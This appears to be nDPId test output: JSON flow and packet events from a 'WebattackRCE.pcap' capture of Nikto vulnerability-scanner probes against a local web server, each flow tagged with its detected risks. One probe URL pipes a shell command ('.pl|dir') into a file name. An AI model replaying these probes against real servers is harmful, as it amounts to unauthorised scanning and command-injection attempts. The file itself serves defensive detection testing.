+00649{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1576420276660,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":196,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":196,"pkt_l4_len":162,"thread_ts_msec":1576420276660,"pkt":"AAAAAAAAAAAAAAAACABFAAC27PBAAEAGT09\/AAABfwAAAcGKH5BK6tTkZxKX74AYAED+qgAAAQEICp1m+tydZvrcR0VUIC8gSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpnZXRpbmZvKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01043{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276660,"flow_last_seen":1576420276660,"flow_idle_time":7560000,"flow_min_l4_payload_len":130,"flow_max_l4_payload_len":130,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":130,"midstream":1,"thread_ts_msec":1576420276660,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49546,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:getinfo)"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276662,"flow_last_seen":1576420276662,"flow_idle_time":7560000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":132,"midstream":1,"thread_ts_msec":1576420276662,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49548,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00649{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1576420276662,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":1576420276662,"pkt":"AAAAAAAAAAAAAAAACABFAAC4K79AAEAGEH9\/AAABfwAAAcGMH5CQBxOx8tDDVoAYAED+rAAAAQEICp1m+t6dZvreR0VUIC8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om1hcF9jb2RlcykNCg0K"} 
+01045{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276662,"flow_last_seen":1576420276662,"flow_idle_time":7560000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":132,"midstream":1,"thread_ts_msec":1576420276662,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49548,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276665,"flow_last_seen":1576420276665,"flow_idle_time":7560000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":1,"thread_ts_msec":1576420276665,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49550,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00705{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1576420276665,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":238,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":238,"pkt_l4_len":204,"thread_ts_msec":1576420276665,"pkt":"AAAAAAAAAAAAAAAACABFAADgK7lAAEAGEF1\/AAABfwAAAcGOH5AW+BO6KmQtsoAYAED+1AAAAQEICp1m+uGdZvrhR0VUIC8waFhDNlpVRS5yZGYrZGVzdHlwZT1jYWNoZStkZXNmb3JtYXQ9UERGIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bWFwX2NvZGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01085{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276665,"flow_last_seen":1576420276665,"flow_idle_time":7560000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":1,"thread_ts_msec":1576420276665,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49550,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.rdf+destype=cache+desformat=PDF","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276666,"flow_last_seen":1576420276666,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276666,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49552,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1576420276666,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276666,"pkt":"AAAAAAAAAAAAAAAACABFAADBh\/hAAEAGtDx\/AAABfwAAAcGQH5AhqL\/5vbvzaYAYAED+tQAAAQEICp1m+uKdZvriR0VUIC8uMGhYQzZaVUUgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptYXBfY29kZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276666,"flow_last_seen":1576420276666,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276666,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49552,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/.0hXC6ZUE","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276667,"flow_last_seen":1576420276667,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276667,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49554,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1576420276667,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276667,"pkt":"AAAAAAAAAAAAAAAACABFAADA3LVAAEAGX4B\/AAABfwAAAcGSH5CmzuS+LKoqroAYAED+tAAAAQEICp1m+uOdZvrjR0VUIC8waFhDNlpVRSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bWFwX2NvZGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} 
+01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276667,"flow_last_seen":1576420276667,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276667,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49554,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276668,"flow_last_seen":1576420276668,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276668,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49556,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1576420276668,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420276668,"pkt":"AAAAAAAAAAAAAAAACABFAADHxyBAAEAGdQ5\/AAABfwAAAcGUH5ATo\/8SaEXHToAYAED+uwAAAQEICp1m+uSdZvrkR0VUIC8waFhDNlpVRS5wbHxkaXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptYXBfY29kZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276668,"flow_last_seen":1576420276668,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276668,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49556,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.pl|dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276669,"flow_last_seen":1576420276669,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276669,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49558,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00665{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1576420276669,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276669,"pkt":"AAAAAAAAAAAAAAAACABFAADE5o1AAEAGVaR\/AAABfwAAAcGWH5C1696FBSsDZ4AYAED+uAAAAQEICp1m+uWdZvrlR0VUIC8waFhDNlpVRS50eHQgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptYXBfY29kZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276669,"flow_last_seen":1576420276669,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276669,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49558,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.txt","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276672,"flow_last_seen":1576420276672,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276672,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49560,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1576420276672,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276672,"pkt":"AAAAAAAAAAAAAAAACABFAADEp8RAAEAGlG1\/AAABfwAAAcGYH5CQgZ\/Tf1wQGoAYAED+uAAAAQEICp1m+uidZvroR0VUIC8waFhDNlpVRS5pZGMgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptYXBfY29kZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
+01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276672,"flow_last_seen":1576420276672,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276672,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49560,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.idc","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276673,"flow_last_seen":1576420276673,"flow_idle_time":7560000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420276673,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49562,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00683{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1576420276673,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":220,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":220,"pkt_l4_len":186,"thread_ts_msec":1576420276673,"pkt":"AAAAAAAAAAAAAAAACABFAADOZZhAAEAG1o9\/AAABfwAAAcGaH5DBdl2HfBCdbYAYAED+wgAAAQEICp1m+umdZvrpR0VUIC8waFhDNlpVRS5CQm9hcmRTZXJ2bGV0IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bWFwX2NvZGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276673,"flow_last_seen":1576420276673,"flow_idle_time":7560000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420276673,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49562,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.BBoardServlet","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 
+00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276675,"flow_last_seen":1576420276675,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276675,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49564,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1576420276675,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276675,"pkt":"AAAAAAAAAAAAAAAACABFAADE9v9AAEAGRTJ\/AAABfwAAAcGcH5BsDc7u0ozjzoAYAED+uAAAAQEICp1m+uqdZvrqR0VUIC8waFhDNlpVRS5jZ2kgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om1hcF9jb2RlcykNCg0K"} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276675,"flow_last_seen":1576420276675,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276675,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49564,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.cgi","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276676,"flow_last_seen":1576420276676,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276676,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49566,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1576420276676,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420276676,"pkt":"AAAAAAAAAAAAAAAACABFAADHEPBAAEAGKz9\/AAABfwAAAcGeH5DFGykA4SBK+YAYAED+uwAAAQEICp1m+uydZvrsR0VUIC8waFhDNlpVRS4xMDoxMDAgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om1hcF9jb2RlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} 
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276676,"flow_last_seen":1576420276676,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276676,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49566,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.10:100","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 